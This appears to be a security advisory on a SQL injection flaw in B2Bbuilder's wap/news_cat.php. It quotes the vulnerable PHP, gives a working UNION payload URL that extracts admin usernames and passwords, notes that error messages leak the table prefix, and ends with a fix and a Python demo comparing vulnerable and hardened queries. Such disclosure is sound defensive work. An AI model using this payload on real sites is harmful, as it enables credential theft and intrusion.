
B2Bbuilder PHP SQL injection - Website Security - Self-taught PHP

Product introduction: B2Bbuilder provides an efficient, stable and powerful B2B e-commerce industry portal solution.

Vulnerability description:

wap/index.php reads the `action` parameter from the query string, checks it against a fixed whitelist, and includes the matching file from inc/:

```php
if (!empty($_GET["action"])) $action = $_GET["action"]; else $action = "home";
//$action=empty($action)?"home":$_GET["action"];
//===============================
if (in_array($action, array('home','offer_cat','offer_list','offer_detail','product_cat','product_list','product_detail','news_cat','news_list','news_detail','corporate_cat','corporate_list','corporate_detail','search','corporate_moredetail','product_showimg'))) {
    require 'inc/'.$action.'.php';
}
```

Because of that whitelist, `action` itself cannot be abused for file inclusion here; the flaw is in the included file inc/news_cat.php, which puts `nid` into a SQL statement without any validation or escaping:

```php
if (!empty($_GET['nid'])) {
    $nid = $_GET['nid'];                                  // taken straight from the query string
    $sql = "select * from ".NEWSCAT." where pid=$nid";    // interpolated unquoted into the WHERE clause
    $db->query($sql);
    $sre = $db->getRows();
    if (count($sre) > 0) {
        foreach ($sre as $v) {
            // "[资讯]" = "[News]"; the category name from the query result is echoed into the link
            echo "[资讯]<a href='?action=news_list&newsid=".$v['catid']."'>".$v['cat']."</a>";
        }
        echo "      <a href='?action=news_cat'><i>返回</i></a>";   // "返回" = "Back"
        //echo "  <anchor>后退<prev/></anchor>";
    } else {
        header("Location:./?action=news_list&nid=".$nid);
        exit();
    }
}
```

`$nid` sits in a numeric context, so no quote characters are needed and magic_quotes_gpc offers no protection: a UNION query can be appended directly. The query results are echoed into the page as link text, so whatever the UNION selects is displayed. In addition, any syntactically wrong value for `nid` produces a database error, and that error message reveals the table prefix.

Test:

http://www.2cto.com/b2b/wap/index.php?action=news_cat&nid=17%20and%201=2%20uNion%20select%201,concat(0x7E217E21,user,0x3A,password,0x7E217E21),3,4,5,6,7,8%20FROM%20<database prefix>_admin

Replace `<database prefix>_admin` with the prefix leaked by the error message. The UNION selects 8 values to match the column count of the NEWSCAT table; 0x7E217E21 and 0x3A are MySQL hex literals for the strings "~!~!" and ":", used as markers so that the user:password pair can be picked out of the rendered link text.

Local file inclusion (restricted by magic_quotes_gpc): module/news/admin/newscat.php

Fix: see the analysis above. Cast `nid` to an integer before it is used, or bind it as a prepared-statement parameter, and do not return raw database error messages to the client.

Author: t00ls.net
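The query construction above and the effect of the page's UNION payload, as an added Python/SQLite example that is not part of the original post or of B2Bbuilder's code. The schema, the hypothetical `b2b_` prefix, the admin row and the 8-column layout of NEWSCAT are constructed assumptions (the payload's 8 values imply an 8-column table); MySQL's `concat()` and hex literals are rewritten with SQLite's `||` and string literals. The hardened function shows the fix named above: check that `nid` is an integer and bind it as a parameter instead of interpolating it.

```python
import sqlite3

# Hypothetical table prefix; on the real site it is leaked through an SQL error.
PREFIX = "b2b_"

# Constructed schema standing in for B2Bbuilder's NEWSCAT and <prefix>_admin tables.
# 8 columns are assumed for newscat because the page's payload unions 8 values.
SCHEMA = f"""
CREATE TABLE {PREFIX}newscat (
    catid INTEGER, cat TEXT, pid INTEGER, sort INTEGER,
    c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT
);
CREATE TABLE {PREFIX}admin (user TEXT, password TEXT);
INSERT INTO {PREFIX}newscat VALUES (1, 'Industry news', 17, 1, '', '', '', '');
INSERT INTO {PREFIX}admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def fresh_db():
    """In-memory database with the constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_news_cat(db, nid):
    """Mirrors news_cat.php: $sql = "select * from ".NEWSCAT." where pid=$nid";"""
    sql = f"select * from {PREFIX}newscat where pid={nid}"   # string interpolation, no validation
    return db.execute(sql).fetchall()


def hardened_news_cat(db, nid):
    """Same lookup with the two fixes: integer validation and a bound parameter."""
    if not str(nid).isdigit():                  # PHP equivalent: (int)$_GET['nid'] or ctype_digit()
        raise ValueError("nid must be an integer")
    return db.execute(f"select * from {PREFIX}newscat where pid=?", (int(nid),)).fetchall()


# The page's payload translated from MySQL to SQLite: 0x7E217E21 is "~!~!" and 0x3A is ":"
# in MySQL, and concat(a,b,c) becomes a || b || c. The 8 selected values must match the
# width of the newscat table or the UNION is rejected.
PAYLOAD = ("17 and 1=2 union select 1, '~!~!' || user || ':' || password || '~!~!',"
           f"3,4,5,6,7,8 from {PREFIX}admin")


def leaked_credentials(rows):
    """Pick the marker-wrapped user:password strings out of the 'cat' column (index 1)."""
    return [r[1] for r in rows if isinstance(r[1], str) and r[1].startswith("~!~!")]


def demo():
    """Run the payload against both versions and report what each one returns."""
    db = fresh_db()
    leaked = leaked_credentials(vulnerable_news_cat(db, PAYLOAD))
    try:
        hardened_news_cat(db, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return {"leaked": leaked,
            "hardened_rejected": rejected,
            "legit_rows": len(hardened_news_cat(db, "17"))}


if __name__ == "__main__":
    print(demo())
```

`vulnerable_news_cat(db, PAYLOAD)` returns the admin credentials wrapped in the `~!~!` markers, which is exactly what the real page would print inside the generated `<a>` links; `hardened_news_cat` rejects the same input before it reaches the database while still serving the legitimate `nid=17` request.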
